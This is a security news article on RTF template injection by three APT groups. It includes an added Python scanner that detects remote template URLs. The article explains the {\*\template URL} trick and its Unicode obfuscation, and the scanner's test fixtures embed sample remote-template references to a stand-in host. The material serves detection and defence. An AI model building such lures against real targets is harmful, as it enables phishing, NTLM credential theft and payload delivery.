
Three APT hacking groups from India, Russia, and China have been observed using a novel RTF (rich text format) template injection technique in their recent phishing campaigns.

This technique is a simple but effective method of retrieving malicious content from a remote URL, and threat analysts expect it to reach a wider audience of threat actors soon.

Researchers at Proofpoint observed the first cases of weaponized RTF template injection in March 2021, and since then, actors have been steadily optimizing the technique.

A simple method to fetch payloads

Rich Text Format (RTF) files are a document format created by Microsoft that can be opened using Microsoft Word, WordPad, and other applications found on almost all operating systems.

When creating RTF files, you can include an RTF Template that specifies how the text in the document should be formatted. These templates are local files imported into an RTF viewer before the contents of the file are displayed, so that the file is formatted correctly.

While RTF Templates are meant to be hosted locally, threat actors are now abusing this legitimate functionality to retrieve a URL resource instead of a local file resource.

This substitution allows threat actors to load malicious payloads into an application like Microsoft Word or perform NTLM authentication against a remote URL to steal Windows credentials. Furthermore, because the files are retrieved as RTF Templates, the phishing lures are more likely to evade detection, since the malicious content is not initially present in the RTF file itself.

Creating remote RTF Templates is very easy, as all a threat actor has to do is add the {*\template URL} command into an RTF file using a hex editor, as shown below.

A URL-hiding example created by Proofpoint's researchers
Source: Proofpoint

The technique is also viable on doc.rtf files opened in Microsoft Word, forcing the app to retrieve the resource from the specified URL before serving the content to the victim, as shown below.

Microsoft Word retrieving the external resource
Source: Proofpoint

Cases of abuse in the wild

Proofpoint has observed this payload retrieval method in phishing campaigns by the pro-Indian hacking group DoNot Team, the Russia-linked Gamaredon hacking group, and the TA423 threat actors.

A timeline of the observed activities is shown below.

Timeline of activities relevant to RTF template injection
Source: Proofpoint

RTF files can parse 16-bit Unicode characters, so threat actors have been using Unicode escapes instead of plaintext strings for the injected URL resource to evade detection.

Using Unicode to hide the URL resource
Source: Proofpoint
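To show the detection side of the two points above (the remote template control word, and the Unicode-escaped form of its URL), here is an added Python scanner; it is example code, not Proofpoint's YARA rules or any sample from the campaigns, and it assumes the RTF default of one fallback character after each \u escape.

```python
import re
import sys

# Added example, not Proofpoint's code: find {\*\template ...} destinations whose
# target, after decoding RTF escapes, is a remote URL. Assumes the RTF default
# \uc1, i.e. exactly one fallback character after each \uN escape.
TEMPLATE_GROUP = re.compile(r"\{\\\*\\template\b([^}]*)\}", re.IGNORECASE)
UNICODE_ESC = re.compile(r"\\u(-?\d+) ?[^\\]?")   # \uN plus its fallback char
HEX_ESC = re.compile(r"\\'([0-9a-fA-F]{2})")       # \'hh single-byte escape
LITERAL_ESC = re.compile(r"\\([\\{}])")            # \\ \{ \} escapes
REMOTE_TARGET = re.compile(r"^(https?|ftp|file)://", re.IGNORECASE)


def decode_rtf_text(fragment: str) -> str:
    """Turn RTF-escaped text back into the string Word would see."""
    fragment = UNICODE_ESC.sub(lambda m: chr(int(m.group(1)) % 0x10000), fragment)
    fragment = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), fragment)
    return LITERAL_ESC.sub(r"\1", fragment)


def find_remote_templates(raw: bytes) -> list:
    """Return every decoded template target that points to a remote URL."""
    text = raw.decode("latin-1")  # RTF is 7-bit; \'hh carries any high bytes
    hits = []
    for match in TEMPLATE_GROUP.finditer(text):
        target = decode_rtf_text(match.group(1)).strip()
        if REMOTE_TARGET.match(target):
            hits.append(target)
    return hits


# Constructed test documents (not real campaign samples). "local" is a benign
# template reference; "plain" and "unicode" carry the same kind of remote URL,
# the second one written as \uN? escapes the way the obfuscated lures do.
SAMPLES = {
    "local":   rb"{\rtf1\ansi{\*\template C:\\Templates\\normal.dotm}Hello}",
    "plain":   rb"{\rtf1\ansi{\*\template http://x.invalid/t}Hello}",
    "unicode": (rb"{\rtf1\ansi{\*\template "
                rb"\u104?\u116?\u116?\u112?\u58?\u47?\u47?\u120?\u46?"
                rb"\u105?\u110?\u118?\u97?\u108?\u105?\u100?}Hello}"),
}

if __name__ == "__main__":
    if len(sys.argv) > 1:          # scan the files named on the command line
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                for url in find_remote_templates(fh.read()):
                    print(f"{path}: remote RTF template -> {url}")
    else:                          # no arguments: run over the constructed samples
        for name, blob in SAMPLES.items():
            print(name, find_remote_templates(blob))
```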

However, in some samples retrieved from the DoNot Team campaigns, Proofpoint observed a failure to pass Microsoft Word's checks, resulting in an error message about the remote source being invalid.

Since these errors are generated before the decoy content is served to the target, the chances of success for DoNot's phishing attempts drop significantly.

TA423, on the other hand, did not obfuscate the injected URLs, trading a higher risk of detection and analysis for error-free loading in Microsoft Word.

TA423 lure using RTF Template injection
Source: Proofpoint

Finally, in the case of Gamaredon, the researchers sampled RTF documents that impersonated Ukrainian government organizations to deliver an MP3 file as a remote resource.

MP3 file fetched as an external resource
Source: Proofpoint

As RTF Template injections are easily accomplished using a hex editing tool and are not as heavily detected by antivirus scanners, they stand to become more widely used by threat actors.

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector,” explained Proofpoint in their report.

“While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”

Furthermore, because the malicious content is retrieved from a remote URL, the threat actors can dynamically modify their campaigns in real time to use new payloads or different malicious behaviors.

To defend against this threat, you should avoid downloading and opening RTF files arriving via unsolicited emails, scan them with an AV scanner, and keep Microsoft Office up to date by applying the latest available security updates.

Proofpoint also shared YARA signatures that admins can use to detect RTF files modified to include remote RTF Templates.
